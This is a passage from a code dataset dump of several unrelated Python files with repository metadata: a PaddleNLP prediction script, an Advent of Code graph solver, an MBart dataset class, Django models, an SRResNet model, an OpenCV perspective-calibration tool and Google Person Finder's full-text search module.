dataset=test_ds.map(trans_func),\n batch_sampler=batch_sampler,\n collate_fn=batchify_fn,\n return_list=True)\n\npretrained_model = paddlenlp.transformers.ErnieGramModel.from_pretrained('ernie-gram-zh')\n\nmodel = PointwiseMatching(pretrained_model)\n\nstate_dict = paddle.load(\"./ernie_gram_zh_pointwise_matching_model/model_state.pdparams\")\n\nmodel.set_dict(state_dict)\n\n# 同时将预测结果输出到终端,便于大家直观感受模型预测效果\ntest_ds = load_dataset(\"lcqmc\", splits=[\"test\"])\n\n# 执行预测函数\ny_probs = predict(model, predict_data_loader)\n\n# 根据预测概率获取预测 label\ny_preds = np.argmax(y_probs, axis=1)\n\nwith open(\"lcqmc.tsv\", 'w', encoding=\"utf-8\") as f:\n f.write(\"index\\tprediction\\n\") \n for idx, y_pred in enumerate(y_preds):\n f.write(\"{}\\t{}\\n\".format(idx, y_pred))\n text_pair = test_ds[idx]\n text_pair[\"label\"] = y_pred\n # print(text_pair)\n# 打印其中的一条内容\nprint(text_pair)\n\n","repo_name":"PaddlePaddle/awesome-DeepLearning","sub_path":"Paddle_Industry_Practice_Sample_Library/Semantic_Matching/code/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"zh","doc_type":"code","stars":2544,"dataset":"github-code","pt":"37"} +{"seq_id":"4401325022","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\nwith open('input', 'r') as f:\n text = f.readlines()\n\nG = nx.Graph()\n\nfor line in text:\n node, neighbors = line.strip().split(' <-> ')\n\n G.add_edges_from([(node, neighbor) for neighbor in neighbors.split(', ')])\n\nnx.draw(G, node_size=5)\nplt.savefig('graph.png')\n\nprint(len(nx.node_connected_component(G, '0')))\nprint(nx.number_connected_components(G))\n","repo_name":"ngoldbaum/advent_of_code_2017","sub_path":"day_12/pipes.py","file_name":"pipes.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20648863210","text":"import json\nfrom torch.utils.data import Dataset\n\n\nclass MBartSummarizationDataset(Dataset):\n def __init__(\n self,\n input_file,\n tokenizer,\n max_source_tokens_count,\n max_target_tokens_count,\n src_lang=\"ru_RU\",\n tgt_lang=\"ru_RU\"\n ):\n self.pairs = []\n with open(input_file, \"r\") as f:\n for line in f:\n record = json.loads(line)\n source = record[\"text\"]\n target = record.get(\"summary\", None)\n self.pairs.append((source, target))\n self.tokenizer = tokenizer\n self.max_source_tokens_count = max_source_tokens_count\n self.max_target_tokens_count = max_target_tokens_count\n self.src_lang = src_lang\n self.tgt_lang = tgt_lang\n\n def __len__(self):\n return len(self.pairs)\n\n def __getitem__(self, index):\n source, target = self.pairs[index]\n batch = self.tokenizer.prepare_seq2seq_batch(\n [source],\n src_lang=self.src_lang,\n tgt_lang=self.tgt_lang,\n tgt_texts=[target],\n return_tensors=\"pt\",\n padding=\"max_length\",\n truncation=True,\n max_length=self.max_source_tokens_count,\n max_target_length=self.max_target_tokens_count)\n return {\n \"input_ids\": batch[\"input_ids\"][0],\n \"attention_mask\": batch[\"attention_mask\"][0],\n \"labels\": batch[\"labels\"][0]\n }\n","repo_name":"IlyaGusev/summarus","sub_path":"external/mbart_hf_scripts/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"37"} +{"seq_id":"17846211489","text":"from django.db import models\n\nclass Uzers(models.Model):\n family = models.CharField(max_length=20, help_text='обязательное поле', verbose_name='Фамилия', blank=False)\n name = models.CharField(max_length=20, help_text='обязательное поле',verbose_name='Имя', blank=False)\n patronymic = models.CharField(max_length=20, help_text='обязательное поле',verbose_name='Отчество', blank=False)\n email = models.EmailField(max_length=50, help_text='обязательное поле',verbose_name='эл.почта', blank=False, unique=True)\n cell = models.BigIntegerField(help_text='обязательное поле в формате 7903ххххххх', blank=False, verbose_name='сотовый')\n def __str__(self):\n s = '{' + f'\"family\": \"{self.family}\", \"name\": \"{self.name}\", \"patronymic\": \"{self.patronymic}\",' \\\n f'\"email\": \"{self.email}\", \"cell\": {self.cell}' + '}'\n return s\n\nclass Coords(models.Model):\n longitude = models.FloatField(help_text='обязательное поле',blank=False, verbose_name='долгота')\n latitude = models.FloatField(help_text='обязательное поле',blank=False, verbose_name='широта')\n height = models.IntegerField(help_text='обязательное поле',blank=False, verbose_name='высота')\n def __str__(self):\n s = '{'+ f'\"longitude\": {self.longitude}, \"latitude\": {self.latitude}, \"height\": {self.height}'+'}'\n return s\n\n\nclass Img(models.Model):\n about_1 = models.CharField(help_text='обязательное поле', max_length=100, verbose_name='описание фото_1', blank=False)\n pic_1 = models.URLField(help_text='обязательное поле, url фото', verbose_name='ссылка на фото_1', blank=False)\n about_2 = models.CharField(default='', max_length=100, verbose_name='описание фото_2', blank=True)\n pic_2 = models.URLField(default='', verbose_name='ссылка на фото_2', blank=True)\n about_3 = models.CharField(default='', max_length=100, verbose_name='описание фото_3', blank=True)\n pic_3 = models.URLField(default='', verbose_name='ссылка на фото_3', blank=True)\n\n def __str__(self):\n s = '{' + f'\"about_1\": \"{self.about_1}\", \"pic_1\": \"{self.pic_1}\", \"about_2\": \"{self.about_2}\",' \\\n f'\"pic_2\": \"{self.pic_2}\", \"about_3\": \"{self.about_3}\", \"pic_3\": \"{self.pic_3}\"' + '}'\n return s\n\n\nclass PerevalAdded(models.Model):\n\n status_list = (('new', 'новый'),('pending', 'в работе'), ('accepted', 'принят'), ('rejected', 'отклонён'))\n difficult_list = (('', 'не указано'), ('1a', '1А'), ('1b', '1Б'), ('2a', '2А'), ('2b', '2Б'), ('3a', '3А'), ('3b', '3Б'),\n ('4a', '4А'),('4b', '4Б'), ('5a', '5А'), ('5b', '5Б'), ('6a', '6А'), ('6b', '6Б'))\n\n status = models.CharField( default='new', blank=False, choices=status_list, verbose_name='статус модерации')\n point = models.OneToOneField(Coords, verbose_name='Координаты',related_name= 'xyz', on_delete=models.CASCADE)\n images = models.OneToOneField(Img, on_delete=models.CASCADE )\n beautyTitle = models.CharField(max_length=200, help_text='обязательное поле', verbose_name='тип объекта', blank=False)\n title = models.CharField(max_length=200, help_text='обязательное поле', verbose_name='название', blank=False)\n other_titles = models.CharField(max_length=200, help_text='обязательное поле', verbose_name='альтернативное название', blank=False)\n connect_other_titles = models.CharField(max_length=200, verbose_name='что соединяет', blank=True)\n add_time = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(Uzers, on_delete=models.CASCADE)\n level_winter = models.CharField(default='',choices=difficult_list, blank=True,null=True, verbose_name='зима')\n level_summer = models.CharField(default='',choices=difficult_list, blank=True,null=True, verbose_name='лето')\n\n\n","repo_name":"stuzerg/fstr","sub_path":"fstr/passag/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30384554346","text":"import torch.nn as nn\n\nfrom models.utils import (get_activation_fn, get_same_padding_layer,\n get_normalization_layer, need_bias)\nfrom models.weight_inits import initialize_weights\n\nREQUIRED_PARAMS = [\n 'num_inputs', 'num_outputs', 'upscale_factor'\n]\n\nOPTIONAL_PARAMS = [\n 'num_filters', 'num_res_blocks',\n 'output_activation', 'act_fn', 'relu_leakiness',\n 'use_norm_layers', 'norm_layer', 'padding'\n]\n\n\ndef construct_model(conf, model_name):\n params = conf.to_param_dict(REQUIRED_PARAMS, OPTIONAL_PARAMS)\n model = SRResNet(**params)\n initialize_weights(model, conf.get_attr('weight_init', default={}))\n return model\n\n\nclass ResBlock(nn.Module):\n def __init__(self, in_channels, num_filters, kernel_size, use_norm_layers,\n norm_layer, act_fn, relu_leakiness=None, padding='zero'):\n \"\"\"Builds a residual block\n\n The implementation follows the SRGAN paper, which uses a residual block\n variant which uses no activation after the addition. This design is based\n on Sam Gross & Michael Wilber: \"Training and investigating Residual Nets\"\n (see http://torch.ch/blog/2016/02/04/resnets.html)\n\n Parameters\n ----------\n in_channels : int\n Number of input channels\n num_filters : int\n Number of convolutional filters to use\n kernel_size : int\n Size of convolution kernel\n use_norm_layers : bool\n If true, uses normalization layers after the convolution layers\n norm_layer : string\n Normalization layer to use. `batch` for batch normalization or `instance`\n for instance normalization\n act_fn : string\n Activation function to use. Either `relu`, `prelu` (default), or `lrelu`\n relu_leakiness : float\n If using lrelu, leakiness of the relus, if using prelu, initial value\n for prelu parameters\n padding : string\n Type of padding to use. Either `zero`, `reflection`, or `replication`\n \"\"\"\n super(ResBlock, self).__init__()\n use_bias = need_bias(use_norm_layers, norm_layer)\n modules = [get_same_padding_layer(kernel_size, stride=1, mode=padding),\n nn.Conv2d(in_channels, num_filters, kernel_size=kernel_size,\n stride=1, bias=use_bias)]\n if use_norm_layers:\n modules.append(get_normalization_layer(norm_layer, num_filters))\n\n modules += [get_activation_fn(act_fn, relu_leakiness, num_filters),\n get_same_padding_layer(kernel_size, stride=1, mode=padding),\n nn.Conv2d(num_filters, num_filters, kernel_size=kernel_size,\n stride=1, bias=use_bias)]\n if use_norm_layers:\n modules.append(get_normalization_layer(norm_layer, num_filters))\n\n self.block = nn.Sequential(*modules)\n\n def forward(self, x):\n return self.block(x) + x\n\n\nclass SRResNet(nn.Module):\n DEFAULT_RELU_LEAKINESS = 0.1\n\n def __init__(self, num_inputs, num_outputs, upscale_factor,\n num_filters=64, num_res_blocks=16,\n output_activation='tanh', act_fn='prelu',\n relu_leakiness=DEFAULT_RELU_LEAKINESS,\n use_norm_layers='not-first', norm_layer='batch',\n padding='zero'):\n \"\"\"Builds a SRResNet (Ledig et al, https://arxiv.org/abs/1609.04802)\n\n Parameters\n ----------\n num_inputs : int\n Number of input channels\n num_outputs : int\n Number of output channels\n upscale_factor : int\n Factor by which the network upscales. Must be divisible by 2 or 3\n num_filters : int\n Number of convolutional filters to use\n num_res_blocks : int\n Number of residual blocks\n output_activation : string\n Either `softmax` or `tanh`. Activation function to use on the logits\n act_fn : string\n Activation function to use. Either `relu`, `prelu` (default), or `lrelu`\n relu_leakiness : float\n If using lrelu, leakiness of the relus, if using prelu, initial value\n for prelu parameters\n use_norm_layers : bool or string\n If true, use normalization layers. If `not-first`, skip the normalization\n after the first convolutional layer\n norm_layer : string\n Normalization layer to use. `batch` for batch normalization or `instance`\n for instance normalization\n padding : string\n Type of padding to use. Either `zero`, `reflection`, or `replication`\n \"\"\"\n super(SRResNet, self).__init__()\n upscale_factor = int(upscale_factor)\n assert (upscale_factor == 1 or\n upscale_factor % 2 == 0 or\n upscale_factor % 3 == 0)\n in_channels = num_inputs\n\n initial_conv = [get_same_padding_layer(kernel_size=9, stride=1,\n mode=padding),\n nn.Conv2d(in_channels, num_filters, kernel_size=9,\n stride=1,\n bias=need_bias(use_norm_layers, norm_layer)),\n get_activation_fn(act_fn, relu_leakiness, num_filters)]\n in_channels = num_filters\n\n if use_norm_layers != 'not-first' and use_norm_layers:\n initial_conv.append(get_normalization_layer(norm_layer, in_channels))\n elif use_norm_layers == 'not-first':\n use_norm_layers = True\n\n res_blocks = []\n for idx in range(num_res_blocks):\n res_blocks += [ResBlock(in_channels, num_filters, kernel_size=3,\n use_norm_layers=use_norm_layers,\n norm_layer=norm_layer, act_fn=act_fn,\n relu_leakiness=relu_leakiness)]\n\n second_conv = [get_same_padding_layer(kernel_size=3, stride=1,\n mode=padding),\n nn.Conv2d(in_channels, num_filters, kernel_size=3,\n stride=1, bias=need_bias(use_norm_layers,\n norm_layer))]\n in_channels = num_filters\n if use_norm_layers:\n second_conv.append(get_normalization_layer(norm_layer, in_channels))\n\n upsample = []\n if upscale_factor > 1:\n scale = 2 if upscale_factor % 2 == 0 else 3\n for idx in range(upscale_factor // scale):\n upsample += [get_same_padding_layer(kernel_size=3, stride=1,\n mode=padding),\n nn.Conv2d(in_channels, scale * scale * 256,\n kernel_size=3, stride=1, bias=True),\n nn.PixelShuffle(upscale_factor=scale),\n get_activation_fn(act_fn, relu_leakiness, 256)]\n in_channels = 256\n\n final_conv = [get_same_padding_layer(kernel_size=9, stride=1,\n mode=padding),\n nn.Conv2d(in_channels, num_outputs, kernel_size=9,\n stride=1, bias=True)]\n if output_activation != 'none':\n final_conv.append(get_activation_fn(output_activation))\n\n self.initial_conv = nn.Sequential(*initial_conv)\n self.body = nn.Sequential(*(res_blocks + second_conv))\n self.upsample = nn.Sequential(*upsample)\n self.final_conv = nn.Sequential(*final_conv)\n self.output_activation = output_activation\n\n def weight_init_params(self):\n init_params = {\n 'conv_weight': ('orthogonal', 'relu')\n }\n\n # Special case for last convolution\n conv = self.final_conv[1]\n assert isinstance(conv, nn.Conv2d)\n if self.output_activation == 'none':\n init_params[conv] = {'weight': 'orthogonal'}\n else:\n init_params[conv] = {'weight': ('orthogonal', self.output_activation)}\n\n return init_params\n\n def forward(self, x):\n initial = self.initial_conv(x)\n x = self.body(initial)\n x = self.upsample(x + initial)\n x = self.final_conv(x)\n return x\n\n","repo_name":"mseitzer/srgan","sub_path":"models/srresnet.py","file_name":"srresnet.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"41700423855","text":"import cv2\nimport numpy as np\n \ntop_left_corner, bottom_right_corner, counter=0,0,0\ncounter = 0\ntop_left_corner=[]\nbottom_right_corner=[]\n\nfrom tkinter import messagebox\n\nix1, iy1 = -1, -1 #a\nix2, iy2 = -1, -1 #b\nix3, iy3 = -1, -1 #c \nix4, iy4 = -1, -1 #d\n\ncolor = (0, 255, 0)\nthickness = 3\n\n# function which will be called on mouse input\ndef drawRectangle(action, x, y, flags, *userdata):\n\n # Mark the top left corner when left mouse button is pressed\n global top_left_corner, bottom_right_corner, counter, a, b, c, d\n global ix1,iy1,ix2,iy2,ix3,iy3,ix4,iy4, color, thickness\n global image \n \n if action == cv2.EVENT_LBUTTONDOWN:\n \n \n top_left_corner = [(x,y)]\n \n if counter==0:\n ix1,iy1 = x,y\n print(\"First point selected: \", ix1, iy1)\n counter+=1\n \n elif counter==1:\n ix2,iy2 = x,y\n print(\"Second point selected: \", ix2, iy2)\n cv2.line(image,(ix1,iy1),(x,y),color,thickness) \n cv2.imshow(\"Window\",image)\n counter+=1\n \n elif counter==2:\n ix3,iy3 = x,y\n print(\"Third point selected: \", ix3, iy3)\n cv2.line(image,(ix2,iy2),(x,y),color,thickness) \n cv2.imshow(\"Window\",image)\n counter+=1\n\n elif counter==3:\n ix4,iy4 = x,y\n print(\"Fourth point selected: \", ix4, iy4)\n cv2.line(image,(ix3,iy3),(x,y),color,thickness)\n cv2.line(image,(x,y),(ix1,iy1),color,thickness)\n cv2.imshow(\"Window\",image)\n counter+=1\n\n elif counter==4:\n counter=0\n print('limite, clique mais uma vez para remcomecar')\n \n image = temp.copy()\n cv2.imshow(\"Window\", image)\n \n messagebox.showinfo('Aviso', \\\n 'Clique mais uma vez para reiniciar')\n\n ix1, iy1 = -1, -1 #a\n ix2, iy2 = -1, -1 #b\n ix3, iy3 = -1, -1 #c \n ix4, iy4 = -1, -1 #d\n \n #print(counter) qtd de vezes \n \ndef normalize_pixel_value(pixel_value, min_pixel_value, max_pixel_value):\n normalized_value = (pixel_value - min_pixel_value) / (max_pixel_value - min_pixel_value)\n return round(normalized_value, 16)\n \n\nimage = cv2.imread(\"../imgs/sample_unball.png\")\n\nscale_percent = 30\nwidth = int(image.shape[1] * scale_percent / 100)\nheight = int(image.shape[0] * scale_percent / 100)\ndim = (width, height)\nimage = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)\n\ntemp = image.copy()\n\ncv2.namedWindow(\"Window\")\ncv2.setMouseCallback(\"Window\", drawRectangle)\n\nk=0\n\nwhile k!=113:\n # Display the image\n cv2.imshow(\"Window\", image)\n k = cv2.waitKey(0)\n # If c is pressed, clear the window, using the dummy image\n if (k == 99):\n image = temp.copy()\n counter = 0\n messagebox.showinfo('Aviso', \\\n 'Reiniciando')\n cv2.imshow(\"Window\", image)\n\n elif k == ord('w') and ix4 != -1 and iy4 != -1:\n\n messagebox.showinfo('WARPING', \\\n 'WARPING')\n \n dst_pts = np.array([[0,0],[image.shape[1]-1,0],[image.shape[1]-1,image.shape[0]-1],[0,image.shape[0]-1]], dtype=np.float32)\n src_pts = np.array([[ix1,iy1],[ix2,iy2],[ix3,iy3],[ix4,iy4]], dtype=np.float32)\n \n height, width, _ = image.shape\n \n base = np.array([[0,0],[1,0],[1,1],[0,1]])\n \n #[(0.1289304826416534, 0.22905718122209823), (0.6941748617054804, 0.19912401471819197), (0.6305899650427946, 0.697082257952009), (0.10528110901008493, 0.7111135428292411)]\n src_pts_malp = []\n \n for i in src_pts:\n x = normalize_pixel_value(i[0],0,image.shape[1])\n y = normalize_pixel_value(i[1],0,image.shape[0])\n src_pts_malp.append((x,y))\n \n key_points = np.array(src_pts_malp) * np.array([width, height])\n frame_points = base * np.array([width, height])\n \n M = cv2.getPerspectiveTransform(src_pts,dst_pts)\n h, mask = cv2.findHomography(key_points, frame_points, cv2.RANSAC)\n #h ou M H-> malp M->BINGAI\n \n print(h)\n print(M)\n \n points = np.array \n image = cv2.warpPerspective(image, h, (image.shape[1], image.shape[0]))\n #image = cv2.warpPerspective(image,M,(image.shape[1],image.shape[0]))\n\n \ncv2.destroyAllWindows()","repo_name":"RaulMyron/visao_estudos","sub_path":"calibrating/calibrating.py","file_name":"calibrating.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36359587570","text":"import logging\nimport re\n\nfrom google.appengine.api import search as appengine_search\n\nimport model\nimport script_variant\n\n# The index name for full text search.\n# This index contains person name and location.\nPERSON_LOCATION_FULL_TEXT_INDEX_NAME = 'person_location_information'\n\nROMANIZE_METHODS = [script_variant.romanize_word_by_unidecode,\n script_variant.romanize_japanese_word,\n script_variant.romanize_chinese_name]\n\n# This is for ranking (person name match higher than location)\nREPEAT_COUNT_FOR_RANK = 5\n\n\ndef create_sort_expressions():\n \"\"\"\n Creates SortExpression's for ranking.\n Returns:\n array of SortExpression\n \"\"\"\n return [appengine_search.SortExpression(\n expression='_score',\n direction=appengine_search.SortExpression.DESCENDING,\n default_value=0.0\n )]\n\n\ndef enclose_in_parenthesis(query_txt):\n \"\"\"\n Encloses each word in query_txt in double quotes.\n Args:\n query_txt: Search query\n Returns:\n '(query_word1) AND (query_word2) ...'\n \"\"\"\n query_words = query_txt.split(',')\n return '(' + ') AND ('.join([word for word in query_words if word]) + ')'\n\n\ndef enclose_in_double_quotes(query_txt):\n \"\"\"\n Encloses each word in query_txt in double quotes.\n Args:\n query_txt: Search query\n Returns:\n '\"query_word1\"'\n \"\"\"\n return '\"' + query_txt + '\"'\n\n\ndef create_non_romanized_query(query_txt):\n \"\"\"\n Creates non romanized query txt.\n Args:\n query_txt: Search query\n Returns:\n '\"query_word1\" \"query_word2\" ...'\n \"\"\"\n query_words = query_txt.split(' ')\n return ' '.join(enclose_in_double_quotes(word) for word in query_words)\n\n\ndef create_romanized_query_txt(query_txt):\n \"\"\"\n Applies romanization to each word in query_txt.\n Args:\n query_txt: Search query\n Returns:\n script varianted query_txt\n \"\"\"\n query_words = query_txt.split(' ')\n query_list = []\n for word in query_words:\n romanized_word_list = script_variant.romanize_search_query(word)\n romanized_word = ' OR '.join(enclose_in_double_quotes(word)\n for word in romanized_word_list)\n query_list.append(romanized_word)\n romanized_query = ','.join([word for word in query_list])\n return enclose_in_parenthesis(romanized_query)\n\n\ndef is_query_match(query_txt, romanized_values):\n \"\"\"\n Checks if a query matches a record\n It should be called in get_person_ids_from_results method.\n Args:\n query_txt: Search query\n romanized_values: field values\n Returns:\n Boolean\n \"\"\"\n # empty matches everything\n if not query_txt:\n return True\n\n romanized_query_list = (script_variant.romanize_search_query(query_txt))\n\n # A query matches a record if all search_terms appear in the record\n for search_terms in romanized_query_list:\n words = search_terms.split(\" \")\n for word_index, word in enumerate(words):\n if not re.search(word, \" \".join(romanized_values), re.I):\n break\n if word_index == len(words) - 1:\n return True\n return False\n\n\ndef get_person_ids_from_results(\n query_dict, results_list, romanized_name_fields, romanized_location_fields):\n \"\"\"\n Returns person record_id of persons\n whose name contain in romanized_name_query and\n location contain in romanized_location_query.\n We use is_query_match to check if romanized_querys match\n at least a part of person name and location.\n To protect users' privacy, we should not return records\n which match location only.\n It also removes dups.\n (i.e., If results_list contains multiple results with the same index_results,\n it returns just one of them)\n \"\"\"\n name_query_txt = query_dict.get('name', '')\n location_query_txt = query_dict.get('location', '')\n\n index_results = []\n added_results = set()\n for results in results_list:\n for document in results:\n fields = {field.name: field.value for field in\n document.fields}\n\n record_id = fields['record_id']\n\n # use set to faster the speed.\n # average time complexity: set-O(1) list-O(n)\n if record_id in added_results:\n continue\n\n romanized_names = [value for name, value in fields.items()\n if name in romanized_name_fields]\n romanized_locations = [value for name, value in fields.items()\n if name in romanized_location_fields]\n\n if (is_query_match(name_query_txt, romanized_names) and\n is_query_match(location_query_txt, romanized_locations)):\n index_results.append(record_id)\n added_results.add(record_id)\n return index_results\n\n\ndef search(repo, query_dict, max_results):\n \"\"\"\n Searches person with index.\n Query_txt must match at least a part of person name.\n (It's not allowed to search only by location.)\n Args:\n repo: The name of repository\n query_dict: Search query dict, {name: name_query, location: location_query}\n max_results: The max number of results you want.(Maximum: 1000)\n Returns:\n - Array of in datastore\n - []: If query_txt doesn't contain a part of person name\n Raises:\n search.Error: An error occurred when the index name is unknown\n or the query has syntax error.\n \"\"\"\n name = query_dict.get('name', '')\n location = query_dict.get('location', '')\n if not name:\n return []\n\n # Order does not matter\n query_list= [name, location]\n query_list_cleaned = query_list if location else [name]\n\n # Remove double quotes so that we can safely apply\n # enclose_in_double_quotes().\n for index, query in enumerate(query_list_cleaned):\n query_list_cleaned[index] = re.sub('\"', '', query)\n\n romanized_query_list = [create_romanized_query_txt(query)\n for query in query_list_cleaned]\n non_romanized_query_list = [create_non_romanized_query(query)\n for query in query_list_cleaned]\n\n # search and sort options\n person_location_index = appengine_search.Index(\n name=PERSON_LOCATION_FULL_TEXT_INDEX_NAME)\n expressions = create_sort_expressions()\n sort_opt = appengine_search.SortOptions(\n expressions=expressions, match_scorer=appengine_search.MatchScorer())\n\n\n # Define the fields need to be returned per romanzie method\n returned_name_fields = [u'names_romanized_by_' + method.__name__\n for method in ROMANIZE_METHODS]\n\n returned_location_fields = [u'full_location_romanized_by_' + method.__name__\n for method in ROMANIZE_METHODS]\n\n returned_fields = (returned_name_fields +\n returned_location_fields + ['record_id'])\n\n options = appengine_search.QueryOptions(\n limit=max_results,\n sort_options=sort_opt,\n returned_fields=returned_fields)\n\n # enclose_in_double_quotes is used for avoiding query_txt\n # which specifies index field name, contains special symbol, ...\n # (e.g., \"repo: repository_name\", \"test: test\", \"test AND test\").\n and_query = ' AND '.join(\n romanized_query_list) + ' AND (repo: ' + repo + ')'\n person_location_index_results = person_location_index.search(\n appengine_search.Query(\n query_string=and_query, options=options))\n\n # To rank exact matches higher than\n # non-exact matches with the same romanization.\n non_romanized_and_query = (' AND '.join(non_romanized_query_list)\n + ' AND (repo: ' + repo + ')')\n non_romanized_person_location_index_results = (\n person_location_index.search(appengine_search.Query(\n query_string=non_romanized_and_query, options=options)))\n\n results_list = [non_romanized_person_location_index_results,\n person_location_index_results]\n\n index_results = get_person_ids_from_results(query_dict,\n results_list, returned_name_fields, returned_location_fields)\n\n results = []\n for record_id in index_results:\n result = model.Person.get(repo, record_id, filter_expired=True)\n if result:\n results.append(result)\n return results\n\n\ndef create_fields_for_rank(field_name, values):\n \"\"\"\n Creates fields for ranking. (person name match > location match)\n MatchScorer class(assigns score) doesn't support to assign\n a score based on term frequency in a field.\n So we add 5 fields for each name params.\n Args:\n field_name: field name\n values: field values\n Returns:\n array of appengine_search.TextField(name=field_name, value=value)\n (length: REPEAT_COUNT_FOR_RANK)\n \"\"\"\n if not values:\n return []\n\n fields = []\n for index, value in enumerate(values):\n for x in xrange(REPEAT_COUNT_FOR_RANK):\n fields.append(\n appengine_search.TextField(name='%s_%d_for_rank_%d' % (\n field_name, index, x),\n value=value))\n return fields\n\n\ndef create_full_name_list_without_space(given_names, family_names):\n \"\"\"\n Creates full name list without white space.\n Returns:\n ['given_name + family_name',\n 'family_name + given_name',...]\n \"\"\"\n full_names = []\n for given_name in given_names:\n for family_name in family_names:\n full_names.append(given_name + family_name)\n full_names.append(family_name + given_name)\n return full_names\n\n\ndef create_full_name_without_space_fields(romanize_method, given_name,\n family_name):\n \"\"\"\n Creates fields with the full name without white spaces.\n Returns:\n fullname fields, romanized_name_list: (for check)\n \"\"\"\n fields = []\n romanized_name_list = []\n romanized_given_names = romanize_method(given_name)\n romanized_family_names = romanize_method(family_name)\n romanize_method_name = romanize_method.__name__\n full_names = create_full_name_list_without_space(\n romanized_given_names, romanized_family_names)\n for index, full_name in enumerate(full_names):\n fields.append(appengine_search.TextField(\n name='no_space_full_name_romanized_by_%s_%d' % (\n romanize_method_name, index),\n value=full_name))\n romanized_name_list.append(full_name)\n return fields, romanized_name_list\n\n\ndef create_romanized_name_fields(romanize_method, **kwargs):\n \"\"\"\n Creates romanized name fields (romanized by romanize_method)\n for full text search.\n \"\"\"\n fields = []\n romanized_names_list = []\n romanize_method_name = romanize_method.__name__\n\n for field_name, field_value in kwargs.iteritems():\n romanized_names = romanize_method(field_value)\n for index, romanized_name in enumerate(romanized_names):\n fields.extend(create_fields_for_rank('%s_romanized_by_%s_%d' %\n (field_name,\n romanize_method_name,\n index),\n romanized_name))\n romanized_names_list.extend(romanized_names)\n\n full_name_fields, romanized_full_names = (\n create_full_name_without_space_fields(\n romanize_method, kwargs['given_name'], kwargs['family_name']))\n fields.extend(full_name_fields)\n romanized_names_list.extend(romanized_full_names)\n\n names = ':'.join([name for name in romanized_names_list if name])\n fields.append(\n appengine_search.TextField(\n name='names_romanized_by_' + romanize_method_name,\n value=names))\n\n return fields\n\n\ndef create_romanized_location_fields(romanize_method, **kwargs):\n \"\"\"\n Creates romanized location fields (romanized by romanize_method)\n for full text search.\n \"\"\"\n fields = []\n romanize_method_name = romanize_method.__name__\n for field in kwargs:\n romanized_locations = romanize_method(kwargs[field])\n for index, romanized_location in enumerate(romanized_locations):\n fields.append(\n appengine_search.TextField(\n name='%s_romanized_by_%s_%d' % (\n field, romanize_method_name, index),\n value=romanized_location)\n )\n full_romanized_location = ':'.join(\n location.value for location in fields if location.value)\n fields.append(appengine_search.TextField(\n name='full_location_romanized_by_' + romanize_method_name,\n value=full_romanized_location))\n return fields\n\n\ndef create_non_romanized_fields(**kwargs):\n \"\"\"\n Creates non romanized fields to rank exact matches higher than\n non-exact matches with the same romanization.\n e.g.,\n if there are records record1:[name=菊地真], record2:[name=菊地眞],\n get results(1st: 菊地真、2nd: 菊地眞) when search by \"菊地 真\"\n \"\"\"\n fields = []\n for field_name in kwargs:\n fields.append(appengine_search.TextField(\n name=field_name, value=kwargs[field_name]))\n return fields\n\n\ndef create_document(person):\n \"\"\"\n Creates document for full text search.\n It should be called in add_record_to_index method.\n \"\"\"\n fields = []\n\n # Add repo and record_id to fields\n repo = person.repo\n record_id = person.record_id\n doc_id = repo + ':' + record_id\n fields.append(appengine_search.TextField(name='repo', value=repo))\n fields.append(\n appengine_search.TextField(name='record_id', value=record_id))\n\n fields.extend(create_non_romanized_fields(\n given_name=person.given_name,\n family_name=person.family_name,\n full_name=person.full_name,\n alternate_names=person.alternate_names,\n home_city=person.home_city,\n home_state=person.home_state,\n home_postal_code=person.home_postal_code,\n home_neighborhood=person.home_neighborhood,\n home_country=person.home_country))\n\n # Applies two methods because kanji is used in Chinese and Japanese,\n # and romanizing in chinese and japanese is different.\n\n for romanize_method in ROMANIZE_METHODS:\n fields.extend(create_romanized_name_fields(\n romanize_method,\n given_name=person.given_name,\n family_name=person.family_name,\n full_name=person.full_name,\n alternate_names=person.alternate_names))\n fields.extend(create_romanized_location_fields(\n romanize_method,\n home_city=person.home_city,\n home_state=person.home_state,\n home_postal_code=person.home_postal_code,\n home_neighborhood=person.home_neighborhood,\n home_country=person.home_country))\n\n return appengine_search.Document(doc_id=doc_id, fields=fields)\n\n\ndef add_record_to_index(person):\n \"\"\"\n Adds person record to index.\n Raises:\n search.Error: An error occurred when the document could not be indexed\n or the query has a syntax error.\n \"\"\"\n person_location_index = appengine_search.Index(\n name=PERSON_LOCATION_FULL_TEXT_INDEX_NAME)\n person_location_index.put(create_document(person))\n\n\ndef delete_record_from_index(person):\n \"\"\"\n Deletes person record from index.\n Args:\n person: Person who should be removed\n Raises:\n search.Error: An error occurred when the index name is unknown\n or the query has a syntax error.\n \"\"\"\n doc_id = person.repo + ':' + person.record_id\n person_location_index = appengine_search.Index(\n name=PERSON_LOCATION_FULL_TEXT_INDEX_NAME)\n person_location_index.delete(doc_id)\n","repo_name":"google/personfinder","sub_path":"app/full_text_search.py","file_name":"full_text_search.py","file_ext":"py","file_size_in_byte":16040,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"37"} +{"seq_id":"12040696437","text":"#### 